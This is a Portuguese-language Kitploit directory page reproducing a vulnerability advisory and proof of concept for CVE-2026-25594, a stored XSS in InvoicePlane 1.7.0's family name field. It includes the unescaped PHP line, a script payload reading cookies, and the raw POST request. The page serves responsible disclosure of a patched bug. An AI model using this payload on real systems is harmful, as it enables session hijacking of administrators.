Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-25594 — Prova de conceito de XSS armazenado para InvoicePlane 1.7.0 por meio do campo sobrenome, incluindo payload, requisição e análise de impacto para pesquisa defensiva. | Kitploit
Ferramentas/GitHubGitHub/lagathos/cve-2026-25594
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebAprendizado e Educação
GitHublagathos/cve-2026-25594

CVE-2026-25594

Prova de conceito de XSS armazenado para InvoicePlane 1.7.0 por meio do campo sobrenome, incluindo payload, requisição e análise de impacto para pesquisa defensiva.

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-25594 — XSS Armazenado via Nome de Família no InvoicePlane 1.7.0

Vulnerabilidade: Cross-Site Scripting (XSS) Armazenado via campo Nome de Família

Produto: InvoicePlane

Versão Afetada: 1.7.0 (e provavelmente versões anteriores)

Severidade: Média

Pontuação CVSS 3.1: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: Neutralização Incorreta de Entrada Durante a Geração de Páginas Web

Descoberto por: Leonidas Agathos

Data do Relatório: 2026-01-31


Descrição

O campo family_name no formulário de família de produtos (/index.php/families/form) aceita entrada arbitrária sem sanitização. O valor é armazenado no banco de dados e posteriormente renderizado sem codificação no menu suspenso de família da página de criação/edição de produtos, causando execução de JavaScript para qualquer administrador que visite o formulário de produtos.

Arquivo vulnerável: application/modules/products/views/form.php:40

root@kitploit:~
// Linha 40
><?php echo $family->family_name; ?></option>

Prova de Conceito

Passo 1 — Injetar payload no Nome de Família

Navegue até /index.php/families/form e envie o seguinte como Nome de Família:

root@kitploit:~
<script>alert('domain:'+document.domain+'cookies:'+document.cookie)</script>

Requisição:

root@kitploit:~
POST /index.php/families/form HTTP/1.1
Host: 172.25.0.12
Content-Type: application/x-www-form-urlencoded

_ip_csrf=...&btn_submit=1&is_update=0&family_name=%3Cscript%3Ealert%28document.cookies%29%3C%2Fscript%3E

Passo 1 - Injetando payload XSS no campo Nome de Família via Burp Suite

Passo 2 — Acionar o XSS

Navegue até /index.php/products/form. O payload é acionado quando o menu suspenso de família é renderizado.

Passo 2 - XSS executando na página do Formulário de Produtos, vazando domínio e cookies


Impacto

Qualquer administrador que visite a página de criação ou edição de produtos terá o payload executado em seu navegador. Isso possibilita sequestro de sessão (se os cookies não forem HttpOnly), roubo de tokens CSRF e ações executadas sob a identidade da vítima.


Linha do Tempo

DataEvento
2026-01-30Vulnerabilidade descoberta
2026-01-31Prova de conceito desenvolvida
2026-01-31Fornecedor notificado
2026-02-04Reconhecimento do fornecedor
2026-02-04Correção lançada
2026-02-05Divulgação pública

Referências

  • CWE-79
  • OWASP: Cross-Site Scripting (XSS)
  • CVE-2026-25594

Aviso Legal

Esta vulnerabilidade foi descoberta durante pesquisa de segurança independente. Todas as informações são fornecidas estritamente para fins educacionais, de pesquisa e defensivos, para auxiliar o fornecedor e a comunidade de segurança a compreender e corrigir o problema. Qualquer uso malicioso destas informações é estritamente proibido.

Baixar ferramenta